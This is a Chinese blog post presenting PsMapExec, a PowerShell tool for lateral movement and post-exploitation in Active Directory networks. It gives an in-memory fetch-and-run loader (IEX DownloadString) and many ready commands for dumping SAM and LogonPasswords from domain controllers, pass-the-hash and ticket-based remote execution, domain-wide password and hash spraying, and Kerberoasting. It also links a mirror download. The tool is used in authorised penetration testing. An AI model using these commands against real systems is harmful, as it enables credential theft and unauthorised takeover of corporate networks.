内网横向PsMapExec
项目介绍
PsMapExec是一个PowerShell工具,灵感主要来自流行工具CrackMapExec / NetExec。PsMapExec旨在通过自己的改进将这些工具的功能和感觉带到PowerShell中,PsMapExec被用作一种利用后的工具来评估Active Directory环境
支持方法
当前支持以下方法:
支持模块
使用示例
模块加载
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")简易示例
# Execute WMI commands over all systems in the domain using password authentication PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami
# Execute WinRM commands over all systems in the domain using hash authenticationPsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami
# Check RDP Access against workstations in the domain and using local authenticationPsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth # Dump SAM on a single system using SMB and a -ticket for authenticationPsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Check SMB Signing on all domain systemsPsMapExec -Targets All -Method GenRelayList
# Dump LogonPasswords on all Domain Controllers over WinRMPsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords
# Use WMI to check current user admin access from systems read from a text filePsMapExec -Targets C:\temp\Systems.txt -Method WMI
# Spray passwords across all accounts in the domainPsMapExec -Method Spray -SprayPassword [Password]
# Spray Hashes across all accounts in the domain that have AdminCount=1PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]
# Spray Hashes across all Domain Admin group usersPsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]
# Kerberoast PsMapExec -Method Kerberoast -ShowOutput
# IPMIPsMapExec -Targets 192.168.1.0/24 -Method IPMI目标搜索
通过PsMapExec进行的目标搜索是通过ADSI搜索器使用的,只要您以域用户帐户的身份从加入域的系统进行操作就不会遇到获取目标的问题,默认情况下只有启用的Active Directory计算机帐户才会填充到目标列表中,除非指定了-Domain,否则PsMapExec会将域设置为当前用户域。与使用内置的ldap查询相比,IP地址定位的优先级较低
# All workstations, servers and domain controllers within the domainPsMapExec -Targets All
# All workstations, servers and domain controllers on the specified domainPsMapExec -Targets All -Domain [Domain]
# Only servers from the domain (exluding DCs)PsMapExec -Targets Servers
# Only Domain Controllers from the domainPsMapExec -Targets DCs
# Only workstations from the domainPsMapExec -Targets Workstations
# Set the target values to a defined computer namePsMapExec -Targets DC01.Security.local
# Read targets from filePsMapExec -Targets "C:\Targets.txt"
# Wildcard filteringPsMapExec -Targets SRV*
# Single IP AddressPsMapExec -Targets 192.168.56.11
# CIDR RangePsMapExec -Targets 192.168.56.0/24认证类型
当-Command和-Module被省略时PsMapExec将简单地根据指定的目标系统检查提供的或当前的用户凭据,以便通过指定的方法进行管理访问
# Current userPsMapExec -Targets All -Method [Method]
# With PasswordPsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# With HashPsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256/NTLM]
# With TicketPsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Local Authentication (WMI only)PsMapExec -Targets All -Method WMI -LocalAuth命令执行
所有当前支持的命令执行方法都支持-Command参数。可以将command参数附加到上述身份验证类型中,以指定用户或当前用户的身份执行给定的命令
PsMapExec -Targets All -Method [Method] -Command [Command]模块执行
所有当前支持的命令执行方法都支持-Module参数。可以将module参数附加到身份验证类型中以指定用户或当前用户的身份执行给定的模块
PsMapExec -Targets All -Method [Method] -Module [Module]项目地址
https://github.com/The-Viper-One/PsMapExec直链下载地址
https://lp.lmboke.com/PsMapExec-main.zip免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
